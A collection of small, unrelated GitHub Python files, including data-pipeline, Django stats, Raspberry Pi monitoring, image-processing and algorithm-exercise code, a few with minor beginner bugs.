+{"seq_id":"71352442461","text":"import pytest\nimport tempfile\nimport os\nfrom tempfile import TemporaryDirectory\nfrom data import Dictionary, Corpus\nfrom batchifier import Batchifier\n\n\ndef dump_sample_sentences():\n sents = [\n 'The quick brown fox jumps over the lazy dog .',\n 'I ate the dinner .',\n 'I love learning .'\n ]\n n_tokens = 10\n\n tmpdir = TemporaryDirectory()\n with open(os.path.join(tmpdir.name, 'train.txt'), 'w', encoding='utf-8') as f:\n for sent in sents:\n f.write(sent+'\\n')\n\n return sents, n_tokens, tmpdir\n\n\ndef test_dictionary():\n d = Dictionary()\n assert d.special_tokens == [d.PAD, d.SOS, d.EOS, d.UNK]\n assert d.convert_token2idx('') == 0\n assert d.convert_token2idx('') == 1\n assert d.convert_token2idx('') == 2\n assert d.convert_token2idx('') == 3\n\n sentence = \"The quick brown fox jumps over the lazy dog\"\n sent_ids = [1, 4, 5, 6, 7, 8, 9, 10, 11, 12, 2]\n tokens = sentence.split(' ')\n for token in tokens:\n d.add_token(token)\n\n assert d.convert_tokens2idxs(tokens) == sent_ids\n assert ' '.join(d.convert_idxs2tokens_prettified(sent_ids)) == sentence\n\n\ndef test_corpus():\n sents, n_tokens, dir_ = dump_sample_sentences()\n tokens = [sent.split(' ') for sent in sents]\n corpus = Corpus(dir_.name, n_tokens)\n\n assert len(corpus.dictionary) == n_tokens\n assert corpus.maxlen == max(list(map(len, tokens)))+2 # +2 for , \n assert len(corpus.train) == len(sents)\n assert corpus.train[0][0] == corpus.dictionary.sos_idx\n assert corpus.train[0][-1] == corpus.dictionary.eos_idx\n assert corpus.test is None\n\n\ndef test_batchifier():\n sents, n_tokens, dir_ = dump_sample_sentences()\n tokens = [sent.split(' ') for sent in sents]\n corpus = Corpus(dir_.name, n_tokens)\n d = corpus.dictionary\n\n batchifier = Batchifier(corpus.train, d.pad_idx, batch_size=2)\n assert len(batchifier) == (len(sents) // 2)\n\n for src, tgt, lengths in batchifier:\n assert src[0][0] == d.sos_idx\n assert tgt[0][-1] == d.eos_idx\n assert ((src != d.pad_idx).long().sum(1) == lengths).all()\n assert ((tgt != d.pad_idx).long().sum(1) == lengths).all()\n\n","repo_name":"awant/arae","sub_path":"tests/test_data.py","file_name":"test_data.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"24877799719","text":"def pokemonfun(numbers):\n\n pokemon = {\n 1: \"pokemon\",\n 2: \"picachu\",\n 3: \"sabasaur\"\n }\n for i in numbers:\n if pokemon.get(i) is None:\n print(\"pokemon not found\")\n else:\n print(pokemon[i])\n\n\nnumbers_list = [int(x) for x in input().split()]\n\nprint(numbers_list)\npokemonfun(numbers_list)\n","repo_name":"Darshna87/python_basics","sub_path":"python_basics_pokemon.py","file_name":"python_basics_pokemon.py","file_ext":"py","file_size_in_byte":351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"32055408312","text":"from datetime import datetime, timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.dummy_operator import DummyOperator\n\nfrom load_to_redshift import LoadToRedshiftOperator\nfrom data_quality import DataCountCheckOperator, TripDateCheckOperator\n\n\ndefault_args = {\n 'owner': 'capstone',\n 'depends_on_past': False, # DAG does not have dependencies on past runs\n 'start_date': datetime(2021, 5, 12),\n 'retries': 3, # Task will be retried for 3 time in case of failure\n 'retry_delay': timedelta(minutes=5), # Interval between retries is 5 min\n 'catchup': False, # Only run latest\n 'email_on_retry': False # Do not email on retry\n}\n\ndag = DAG('capstone_pipeline',\n default_args=default_args,\n max_active_runs=1)\n\nS3_BUCKET = \"s3://dend-capstone-project-workspace/processed/\"\n\nload_trip_table = LoadToRedshiftOperator(\n task_id='load_trip_table_to_redshift',\n dag=dag,\n table=\"trip\",\n s3_path=S3_BUCKET + \"trip_data\"\n)\n\nload_station_table = LoadToRedshiftOperator(\n task_id='load_station_table_to_redshift',\n dag=dag,\n table=\"station\",\n s3_path=S3_BUCKET + \"station_data\"\n)\n\nload_covid_table = LoadToRedshiftOperator(\n task_id='load_covid_table_to_redshift',\n dag=dag,\n table=\"covid\",\n s3_path=S3_BUCKET + \"covid_data\"\n)\n\nload_weather_table = LoadToRedshiftOperator(\n task_id='load_weather_table_to_redshift',\n dag=dag,\n table=\"weather\",\n s3_path=S3_BUCKET + \"weather_data\"\n)\n\ndata_count_checks = DataCountCheckOperator(\n task_id='check_data_count',\n dag=dag,\n redshift_conn_id=\"redshift\",\n tables=['trip', 'station', 'covid', 'weather']\n)\n\ndate_checks = TripDateCheckOperator(\n task_id='check_trip_date',\n dag=dag,\n redshift_conn_id=\"redshift\"\n)\n\nfinish_load_operator = DummyOperator(task_id='finish_loading', dag=dag)\n\nend_operator = DummyOperator(task_id='stop_execution', dag=dag)\n\n[load_trip_table, load_station_table, load_covid_table, load_weather_table] \\\n >> finish_load_operator \\\n >> [data_count_checks, date_checks] \\\n >> end_operator\n","repo_name":"zhujun98/data-engineering","sub_path":"dend/dend_capstone_project/airflow/dags/capstone_pipeline.py","file_name":"capstone_pipeline.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"69"}
+{"seq_id":"22795502949","text":"from dataclasses import dataclass, astuple\nfrom typing import Tuple\n\nimport cv2\nimport numpy as np\n\nfrom primitives.color import Color\nfrom primitives.point import Point\n\n\n@dataclass\nclass Ellipse:\n color : Color\n position : Point\n axes : Tuple[ int, int ]\n angle : float\n\n\ndef draw_ellipse_on_image( ellipse : Ellipse, image : np.ndarray ) -> np.ndarray:\n image = cv2.ellipse(\n image,\n center = astuple( ellipse.position ),\n axes = ellipse.axes,\n angle = ellipse.angle,\n startAngle = 0,\n endAngle = 360,\n color = ellipse.color,\n thickness = cv2.FILLED,\n lineType = cv2.LINE_AA\n )\n return image\n","repo_name":"berryvansomeren/drarwing","sub_path":"primitives/ellipse.py","file_name":"ellipse.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23776371029","text":"from collections import defaultdict\nfrom datetime import date\nfrom decouple import config, Csv\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.contrib.auth.models import User\nfrom django.db.models.functions import Lower\nfrom django.db.models import Q\nfrom django.utils import timezone\n\nfrom myreadinglist.mail import send_email\nfrom books.models import UserBook\nfrom goal.models import Goal, current_year\n\nPYBITES_EMAIL_GROUP = config('PYBITES_EMAIL_GROUP', cast=Csv())\nFRIDAY = 4\nONE_WEEK_AGO = timezone.now() - timezone.timedelta(days=7)\nCOMPLETED = 'c'\nSUBJECT = 'Weekly PyBites Books stats'\nMSG = \"\"\"\nUsage stats:\n- {num_total_users} total users ({num_new_users} new users joined last week).\n- {num_books_clicked} books were clicked.\n- {num_books_completed} books were completed (= {num_books_completed_pages} pages read).\n\nNew user profiles:\n{new_user_profiles}\n\nWhat books were completed last week? {books_completed}\n\nMost ambitious readers (# books to read goal this year):\n{goals}\n\nUpdate your reading here:\nhttps://pybitesbooks.com\n\"\"\"\nPROFILE_PAGE = settings.DOMAIN + \"/users/{username}\"\nTHIS_YEAR = current_year()\n\n\nclass Command(BaseCommand):\n help = 'email app stats'\n\n def add_arguments(self, parser):\n parser.add_argument(\n '--now',\n action='store_true',\n dest='now',\n help='flag to show stats now = bypass day of the week check',\n )\n\n def handle(self, *args, **options):\n run_now = options['now']\n\n # seems heroku does not support weekly cronjobs\n if not run_now and date.today().weekday() != FRIDAY:\n return\n\n all_users = User.objects.all()\n new_users = all_users.filter(\n date_joined__gte=ONE_WEEK_AGO)\n num_new_users = new_users.count()\n\n num_books_clicked = UserBook.objects.filter(\n inserted__gte=ONE_WEEK_AGO\n ).count()\n\n books_read_last_week = UserBook.objects.select_related(\n 'book', 'user'\n ).filter(\n Q(completed__gte=ONE_WEEK_AGO) & Q(status=COMPLETED)\n ).order_by(Lower('user__username'))\n\n num_books_completed = books_read_last_week.count()\n num_books_completed_pages = sum(\n int(ub.book.pages) for ub in books_read_last_week\n )\n new_user_profiles = ' '.join(\n (f\"- {uu.username} > \"\n f\"{PROFILE_PAGE.format(username=uu.username)}\")\n for uu in new_users\n )\n\n books_completed_per_user = defaultdict(list)\n for ub in books_read_last_week:\n books_completed_per_user[ub.user.username].append(ub.book)\n\n books_completed = []\n for username, user_books in books_completed_per_user.items():\n books_completed.append(f\" * {username}:\")\n books_completed.append(\n \"\".join(\n f' - {book.title} > {book.url}'\n for book in user_books\n )\n )\n\n goals = Goal.objects.filter(\n year=THIS_YEAR, number_books__gt=0\n ).order_by(\"-number_books\")\n goals_out = ' '.join(\n f'{goal.user.username} > {goal.number_books}'\n for goal in goals\n )\n\n msg = MSG.format(num_total_users=all_users.count(),\n num_new_users=num_new_users,\n new_user_profiles=new_user_profiles,\n num_books_clicked=num_books_clicked,\n num_books_completed=num_books_completed,\n num_books_completed_pages=num_books_completed_pages,\n books_completed=\"\".join(books_completed),\n goals=goals_out)\n\n for to_email in PYBITES_EMAIL_GROUP:\n send_email(to_email, SUBJECT, 
msg)\n","repo_name":"PyBites-Open-Source/pybitesbooks","sub_path":"myreadinglist/management/commands/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":3869,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"69"}
+{"seq_id":"23371472226","text":"import gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nclass Animator(Gtk.DrawingArea):\n def __init__(self, **properties):\n super().__init__(**properties)\n self.set_size_request(200, 80)\n self.connect(\"draw\", self.do_drawing)\n GLib.timeout_add(50, self.tick)\n\n def tick(self):\n self.queue_draw()\n return True\n\n def do_drawing(self, widget, ctx):\n self.draw(ctx, self.get_allocated_width(), self.get_allocated_height())\n\n def draw(self, ctx, width, height):\n pass\n\nclass ListeningAnimator(Animator):\n def __init__(self, window, **properties):\n super().__init__(**properties)\n self.window = window\n self.tc = 0\n\n def draw(self, ctx, width, height):\n\n self.tc += 0.2\n self.tc %= 2 * math.pi\n\n for i in range(-4, 5):\n ctx.set_source_rgb(0.2, 0.5, 1)\n ctx.set_line_width(6)\n ctx.set_line_cap(cairo.LINE_CAP_ROUND)\n if i % 2 == 0:\n ctx.move_to(width / 2 + i * 10, height / 2 + 3 - \n 8 * math.sin(self.tc + i))\n ctx.line_to(width / 2 + i * 10, height / 2 - 3 + \n 8 * math.sin(self.tc + i))\n else:\n ctx.set_source_rgb(0.2, 0.7, 1)\n ctx.move_to(width / 2 + i * 10, height / 2 + 3 - \n 8 * math.cos(self.tc - i))\n ctx.line_to(width / 2 + i * 10, height / 2 - 3 + \n 8 * math.cos(self.tc - i))\n ctx.stroke()\n","repo_name":"1noro/fastmind","sub_path":"tests/pycairo/test4/test4.py","file_name":"test4.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"28029255775","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nDownload fastq files from ENA.\n\"\"\"\n\nfrom sys import argv\nimport re\nimport os\n\nscript, first, second = argv\nworking_dir = first\ndata_file = second\n\n#dir = os.path.dirname(os.path.realpath(__file__))\n#data_file_full = os.path.join(dir,data_file)\ndata_file_full = data_file\n\nmaster_file = \"run_ENA_download_Py.sh\"\n\nfile_out = open(master_file, 'w')\nfile_out.write(\"#!/bin/sh\\n\")\nfile_out.write(\"cd \"+working_dir + \"\\n\")\n\t\t\nnum = 0\nrun_position = 0\nftp_position = 0\t\nwith open(data_file_full, 'r') as file_in:\t\n\tfor line in file_in.readlines():\n\t buffer = re.split(r'\\t', line.strip())\t \n\t num += 1\t \n\t if num == 1 :\n\t \tfor x in range(0,len(buffer)):\n\t \t\tif buffer[x] == 'run_accession' :\n\t \t\t\trun_position = x\n\t \t\tif buffer[x] == 'fastq_ftp' :\n\t \t\t\tftp_position = x\n\t else:\n\t \trun_id = buffer[run_position]\n\t \tftp_id_string = buffer[ftp_position]\n\t \t\n\t \tftp_ids = re.split(r'\\;', ftp_id_string)\n\t \tfq_num = 0 \n\t \tfor ftp_addr in ftp_ids :\n\t \t\tfq_num += 1\n\t \t\tsh_file = 'runPy_'+ str(num-1)+ '_'+ run_id+'_'+ str(fq_num) +'.sh'\n\t \t\t# master shell file\n\t \t\tfile_out.write('qsub -q copyq '+ sh_file + \" \\n\")\n\t \t\t\n\t \t\twith open(sh_file, 'w') as file_shell :\n\t \t\t\tfile_shell.write(\"#!/bin/sh\\n\")\n\t \t\t\tfile_shell.write(\"cd \"+ working_dir + \"\\n\")\n\t \t\t\tfile_shell.write(\"wget \"+ ftp_addr)\n\nfile_out.close()\n## Author : lxue@uga.edu\n \n \n","repo_name":"liangjiaoxue/PythonNGSTools","sub_path":"Download_FTP_ENA.py","file_name":"Download_FTP_ENA.py","file_ext":"py","file_size_in_byte":1460,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"69"}
+{"seq_id":"1172599688","text":"#!/usr/bin/env python\n\nimport urllib.request as urlrequest\nimport re\n\n\ndef ip_v4():\n\trequest = urlrequest.urlopen(\"http://checkip.dyndns.org/\").read()\n\toutput = request.decode('utf-8')\n\n\tIPv4 = re.findall(\"\\d{1,3}.\\d{1,3}.\\d{1,3}.\\d{1,3}\", output)\n\tvalue = IPv4[0]\n\tprint (\"IP V4: \", value)\n\tprint (\"\")\n\ndef ip_v6():\n\trequest = urlrequest.urlopen(\"http://show-my-ip.de\").read()\n\toutput = request.decode('utf-8')\n\t\n\tIPv6 = re.findall(\"IP is (.+?) \", output)\n\tvalue = IPv6[0]\n\tx = (\":\")\n\tif x in value:\n\t\tprint(\"IP V6:\", value)\n\t\tprint(\"\")\n\telse:\n\t\tprint(\"IPv6: (only IPv4)\")\n\t\tprint(\"\")\n\n\nif __name__ == \"__main__\":\n\tprint (\"Getting externel IP\")\n\tprint (\"-\"*19)\n\tip_v4()\n\tip_v6()\n","repo_name":"sinooverride/Simple-Python-3.5","sub_path":"external_ip.py","file_name":"external_ip.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17726819390","text":"import tkinter as tk\nfrom tkinter import scrolledtext\nimport time\nimport subprocess\nimport psutil\nimport paramiko\nimport os\n\n# Constants\nPRIVATE_KEY_PATH = \"/home/host/.ssh/id_rsa\"\nBYTES_IN_ONE_MIB = 1048576 # 1024 * 1024\nENABLE_DEBUG = False\nos.environ['DISPLAY'] = ':0'\n\ndef debug_log(message):\n if ENABLE_DEBUG:\n print(f\"[DEBUG] {message}\")\n\n\ndef get_local_voltage():\n try:\n debug_log(\"Executing vcgencmd measure_volts to get voltage.\")\n output = subprocess.check_output(['vcgencmd', 'measure_volts'], text=True)\n voltage = output.strip().replace('volt=', '').replace('V', ' V')\n return voltage\n except Exception as e:\n debug_log(f\"Couldn't fetch voltage. Error: {e}\")\n return \"N/A\"\n\n\ndef check_service_status(service_name):\n debug_log(f\"Checking service status for {service_name}\")\n try:\n subprocess.check_call(['systemctl', 'is-active', '--quiet', service_name])\n return True\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return False\n\n\ndef check_internet_status():\n debug_log(\"Checking internet status\")\n try:\n subprocess.check_output(['ping', '-c', '1', '8.8.8.8'])\n return True\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return False\n\n\ndef get_ssh_connections():\n debug_log(\"Fetching SSH connections\")\n try:\n output = subprocess.check_output(['netstat', '-tn'], text=True)\n debug_log(f\"Raw netstat output: {output}\")\n \n lines = output.strip().split('\\n')\n ssh_connections = [line for line in lines if '22' in line.split()[3] and 'ESTABLISHED' in line.split()[5]]\n debug_log(f\"Filtered SSH connections: {ssh_connections}\")\n \n details = []\n for line in ssh_connections:\n elements = line.split()\n local_addr = elements[3]\n remote_addr = elements[4]\n details.append(f\"{local_addr} <-> {remote_addr}\")\n return len(ssh_connections), details\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return \"N/A\", []\n\n\ndef get_remote_info(host, username, port=22):\n try:\n client = paramiko.SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n mykey = paramiko.RSAKey(filename=PRIVATE_KEY_PATH)\n client.connect(host, port, username=username, pkey=mykey)\n\n commands = {\n 'Temperature': 'vcgencmd measure_temp',\n 'CPU Load': \"cat /proc/loadavg | awk '{print $1,$2,$3}'\",\n 'Free Disk Space': \"df -h / | awk 'NR==2 {print $4}'\",\n 'Uptime': 'uptime -p',\n 'Voltage and Throttle Status': 'vcgencmd get_throttled'\n }\n\n info = {}\n for key, command in commands.items():\n stdin, stdout, stderr = client.exec_command(command)\n output = stdout.read().decode('utf-8').strip()\n info[key] = output\n\n client.close()\n return info\n\n except Exception as e:\n debug_log(f\"Exception occurred: {e}\")\n return None\n\n\ndef get_system_info():\n debug_log(\"Fetching system information\")\n\n cpu_percent = psutil.cpu_percent(interval=1)\n ram = psutil.virtual_memory()\n disk = psutil.disk_usage('/')\n net_io = psutil.net_io_counters()\n sent = net_io.bytes_sent / BYTES_IN_ONE_MIB\n received = net_io.bytes_recv / BYTES_IN_ONE_MIB\n local_voltage = get_local_voltage()\n local_volt_throttle_status = subprocess.check_output(['vcgencmd', 'get_throttled'], text=True).strip()\n remote_info = get_remote_info('192.168.4.114', 'pkvirus')\n\n smb_status = check_service_status('smbd')\n internet_status = check_internet_status()\n ssh_connection_count, ssh_connection_details = get_ssh_connections()\n\n output = 
f\"===== Local System Status =====\\n\"\n output += f\"CPU Usage: {cpu_percent}%\\nRAM Usage: {ram.percent}%\\nDisk Usage: {disk.percent}%\\n\"\n output += f\"Voltage: {local_voltage}\\nLocal Voltage and Throttle Status: {local_volt_throttle_status}\\n\"\n output += f\"Data Sent: {sent:.2f} MiB\\nData Received: {received:.2f} MiB\\n\"\n output += f\"SMB Status: {'Up' if smb_status else 'Down'}\\nInternet Status: {'Up' if internet_status else 'Down'}\\n\"\n output += f\"SSH Connections: {ssh_connection_count}\\n\"\n for detail in ssh_connection_details:\n output += f\" - {detail}\\n\"\n output += \"==================================\\n\"\n\n if remote_info is not None:\n output += \"===== Remote System Status =====\\n\"\n output += f\"Temperature: {remote_info.get('Temperature', 'N/A')}\\n\"\n output += f\"CPU Load: {remote_info.get('CPU Load', 'N/A')}\\n\"\n output += f\"Free Disk Space: {remote_info.get('Free Disk Space', 'N/A')}\\n\"\n output += f\"Uptime: {remote_info.get('Uptime', 'N/A')}\\n\"\n output += f\"Voltage and Throttle Status: {remote_info.get('Voltage and Throttle Status', 'N/A')}\\n\"\n else:\n output += \"Could not fetch remote system information\\n\"\n\n if \"0x00001\" in local_volt_throttle_status:\n output += \"WARNING: Local Under-voltage detected!\\n\"\n if \"0x00004\" in local_volt_throttle_status:\n output += \"WARNING: Local Throttling active!\\n\"\n\n output += \"=========================\\n\"\n\n return output\n\n\nclass SystemStatusMonitor(tk.Tk):\n def __init__(self):\n super().__init__()\n self.title(\"System Status Monitor\")\n self.geometry(\"600x600\")\n\n self.text_widget = scrolledtext.ScrolledText(self, wrap=tk.WORD, width=70, height=30)\n self.text_widget.pack()\n\n self.refresh()\n\n def refresh(self):\n try:\n output = get_system_info()\n self.text_widget.config(state=tk.NORMAL)\n self.text_widget.delete(\"1.0\", tk.END)\n self.text_widget.insert(tk.INSERT, output)\n self.text_widget.config(state=tk.DISABLED)\n self.after(5000, self.refresh)\n except Exception as e:\n self.text_widget.insert(tk.INSERT, f\"An error occurred: {e}\")\n self.text_widget.config(state=tk.DISABLED)\n\n\nif __name__ == \"__main__\":\n app = SystemStatusMonitor()\n app.mainloop()\n","repo_name":"PKHarsimran/RaspiTFTServerStatus","sub_path":"MainTFTwithXS.py","file_name":"MainTFTwithXS.py","file_ext":"py","file_size_in_byte":6227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"23204990890","text":"# Edit these to configure your set and relation.\nparam1 = {1, 2, 3, 4, 5}\nparam2 = {(1, 2), (2, 3), (1, 3), (2, 2)}\n\n\n\n\n\n\ndef Is_reflexive(set1, set2):\n# Checks if a relation is reflexive\n # Empty set to catch integers used in relation\n domain_integers = set()\n # Iterating through the tuples of the relations\n for tuple in set2:\n # If the tuple is reflexive we add it to the domain set.\n if tuple[0] == tuple[1]:\n domain_integers.add(tuple[0])\n \n # Defining the integers that were not reflexive in the above iteration.\n reflexive_test_integers = set1 - domain_integers\n # Iterate by each of these found values, through tuples in set2\n for integer in reflexive_test_integers:\n for tuple in set2:\n # Did we find any relations on these non-reflexive integers? If not we push on.\n if integer == tuple[0]:\n return f\"Is R reflexive? No, '{integer}' in the domain has a relation but not to itself.\"\n\n # We can infer that if domain integers is a subset of our set1 after catching all other cases, we can say it is reflexive.\n if domain_integers.issubset(set1):\n return \"Yes\"\n \n\n\n\ndef Is_symmetric(set2):\n # Iterating to go through each tuple's elements\n for tuple in set2:\n # Defining a new tuple that is the inverse of the tuple we are using to iterate with.\n new_tuple = (tuple[1], tuple[0])\n # If the new tuple is in our set, then we know it is symmetric so we can continue.\n if new_tuple in set2:\n continue\n # If we don't find the tuple we're looking for, it's not symmetrical.\n else:\n return f\"Is R symmetric? No, {tuple} not symmetrical\"\n # Returning yes to print that it is symmetrical.\n return \"Yes\"\n\n\n\n\ndef Is_transitive(set2):\n # Iterating two tuples to find cases where the values connect to each other.\n for tuple1 in set2:\n for tuple2 in set2:\n if tuple1[1] == tuple2[0]:\n # If that's all good, we can get into our 3rd tuple. We check here that the value of tuple2 can map to the same endpoint as tuple3.\n for tuple3 in set2:\n if tuple2[1] == tuple3[1]:\n # If it does, we define a new simulated tuple to test over our relation. We want to go from Point A to Point C directly.\n new_tuple = (tuple1[0], tuple3[1])\n # If we don't find it, we can finally say it's not transitive.\n if new_tuple not in set2:\n return f\"Is R transitive? No, you cannot get from {tuple1[0]} to {tuple3[0]} with a shortcut.\"\n # Else continue used to reset the iterator to the next tuple3 case if it was found in there.\n else:\n continue\n # Else continue used to reset the iterator to the next tuple1 and tuple2 match case if it was not found in there.\n else:\n continue\n # Yes statement to show that it is true.\n return \"Is R transitive? Yes\"\n\n# Catch all function to show the entire solution. Call this at the top!\ndef what_is_this_function(param1, param2):\n print(f\"Set A = {param1}\")\n print(f\"Rel R = {param2}\")\n print(Is_reflexive(param1, param2))\n print(Is_symmetric(param2))\n print(Is_transitive(param2))\n\n# Executing the big function to display all the results.\nwhat_is_this_function(param1, param2)","repo_name":"OliWongDev/Reflexive-Symmetric-Transitive-Functions","sub_path":"relations-and-sets-python-challenges.py","file_name":"relations-and-sets-python-challenges.py","file_ext":"py","file_size_in_byte":3483,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"33452376345","text":"# import the necessary packages\nfrom __future__ import print_function\nimport numpy as np\nimport argparse\nimport cv2\n\nmatrix = np.array([ [69, 124, 136, 220], \n [64, 112, 198, 200], \n [26, 89, 156, 21], \n [36, 78, 241, 180]\n ])\n\n\n#matrix = matrix.astype(\"uint8\")\n\n\"\"\"\ndef adjust_gamma(image, gamma):\n\n\t# build a lookup table mapping the pixel values [0, 255] to\n\t# their adjusted gamma values\n\ttable = np.array([((i / 255.0) ** gamma) * 255\n\t\tfor i in np.arange(0, 256)]).astype(\"uint8\")\n\t# apply gamma correction using the lookup table\n\treturn cv2.LUT(image, table)\n\nadjusted = adjust_gamma(matrix, 1.8)\nprint(adjusted)\nprint(\"Lmax:\",np.max(adjusted))\nprint(\"Lmin:\",np.min(adjusted))\nprint(\"Lsr:\",np.sum(adjusted)/16) \n\"\"\"\n\ndef blur(a):\n kernel = np.array([[1/9,1/9,1/9], [1/9,1/9,1/9], [1/9,1/9,1/9]])\n kernel = kernel / np.sum(kernel)\n arraylist = []\n for y in range(3):\n temparray = np.copy(a)\n temparray = np.roll(temparray, y - 1, axis=0)\n for x in range(3):\n temparray_X = np.copy(temparray)\n temparray_X = np.roll(temparray_X, x - 1, axis=1)*kernel[y,x]\n arraylist.append(temparray_X)\n\n arraylist = np.array(arraylist)\n arraylist_sum = np.sum(arraylist, axis=0)\n return arraylist_sum\n\navg=blur(matrix)\nprint(avg)\nprint(\"Lmax:\",np.max(avg))\nprint(\"Lmin:\",np.min(avg))\nprint(\"Lsr:\",np.sum(avg)/16) \n\n\"\"\"\ndef gaussian(sigma,Y,X):\n kernel = np.zeros((Y,X))\n ax = range(X) - np.floor(X/2)\n ay = range(Y) - np.floor(Y/2)\n xx,yy = np.meshgrid(ax,ay)\n kernel = np.exp(-0.5 * (np.square(xx) + np.square(yy)))/np.square(sigma)\n kernel = kernel/np.sum(kernel)\n return kernel \n\"\"\"\n","repo_name":"Mihael283/Multimedijski_sustavi","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"33671571067","text":"import operator\n\nOPERATORS = {\"+\": operator.add, \"-\": operator.sub, \"*\": operator.mul, \"/\": operator.truediv}\n\n\ndef evaluate_rpn(expression, operators):\n operands = []\n\n for symbol in expression:\n if symbol in operators:\n second, first = operands.pop(), operands.pop()\n operands.append(operators[symbol](first, second))\n else:\n operands.append(symbol)\n\n return operands.pop()\n\n\nif __name__ == \"__main__\":\n print(evaluate_rpn([5, 2, 1, \"-\", \"*\", 4, \"+\"], OPERATORS))\n","repo_name":"dexter2206/algorytmy-i-struktury-danych-pytktw4","sub_path":"rpn.py","file_name":"rpn.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"18974161581","text":"#-*- coding: utf-8 -*-\n\nimport PRi.GPIO as gpio\nimport time\n\nled1 = 20\nled2 = 21\nsensor = 17\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\n\nGPIO.setup(led1, GPIO.OUT)\nGPIO.setup(led2, GPIO.OUT)\nGPIO.setup(sensor, GPIO.IN)\n\nprint(\"PIR 준비\")\ntime.sleep(3)\n\ntry:\n while(1):\n if GPIO.input(sensor) == 1:\n GPIO.output(led2,1)\n GPIO.output(led1,0)\n print(\"동작감지\")\n time.sleep(0.2)\n \n elif GPIO.input(sensor) == 0:\n GPIO.output(led1,1)\n GPIO.output(led2,0)\n time.sleep(0.2)\n \nexcept KeyboardInterrupt:\n print(\"정지\")\n GPIO.cleanup()","repo_name":"ChaehwanLee/Practice","sub_path":"led1.py","file_name":"led1.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"29271780220","text":"#-*- coding: utf-8 -*-\n#!/usr/bin/python3\n#Filename: randata.py\n#Author: JinQian Chen\n#Email: 2012chenjinqian@gmail.com\n#License: GPL\n\nimport random\n#print(\"Now importing randata\") #print only when first time imported.\ndef getran(num, rang):\n \"\"\"\n getran(n, R), make a list with n numbers of rang R.\n \"\"\"\n a = []\n i = 0\n while i < num:\n a.append(random.randint(0, rang))\n i += 1\n return a\n\ndef getzero(num):\n a = []\n i = 0\n while i < num:\n a.append(0)\n i += 1\n return a\n","repo_name":"chenjinqian/snack_sort","sub_path":"randata.py","file_name":"randata.py","file_ext":"py","file_size_in_byte":532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20093279642","text":"def solution(N, stages):\n people_challenged = len(stages)\n failure_rate = [0] * (N + 2)\n for stage in stages:\n failure_rate[stage] += 1\n\n for i in range(1, N + 1):\n if people_challenged > 0:\n temp = failure_rate[i]\n failure_rate[i] /= people_challenged\n people_challenged -= temp\n else:\n break\n\n return [i[0] + 1 for i in sorted(enumerate(failure_rate[1:-1]), key=lambda x: (-x[1], x[0]))]\n\nprint(solution(5, [2, 1, 2, 6, 2, 4, 3, 3]\t))\nprint(solution(4, [4, 4, 4, 4]\t))\n\n\n# def solution(N, stages):\n# fail = [[x+1] for x in range(N)]\n# sum_of_fail = 0\n# for i in range(N):\n# if sum_of_fail != len(stages):\n# failure_rate = stages.count(i+1) / (len(stages) - sum_of_fail)\n# sum_of_fail = sum_of_fail + stages.count(i+1)\n# fail[i].append(failure_rate)\n# else:\n# fail[i].append(0)\n# fail.sort(key=lambda x:x[1], reverse=True)\n# answer = [fail[i][0] for i in range(N)]\n# return answer","repo_name":"jinistic/algorithms","sub_path":"ndb coding test/11-25 실패율.py","file_name":"11-25 실패율.py","file_ext":"py","file_size_in_byte":1049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
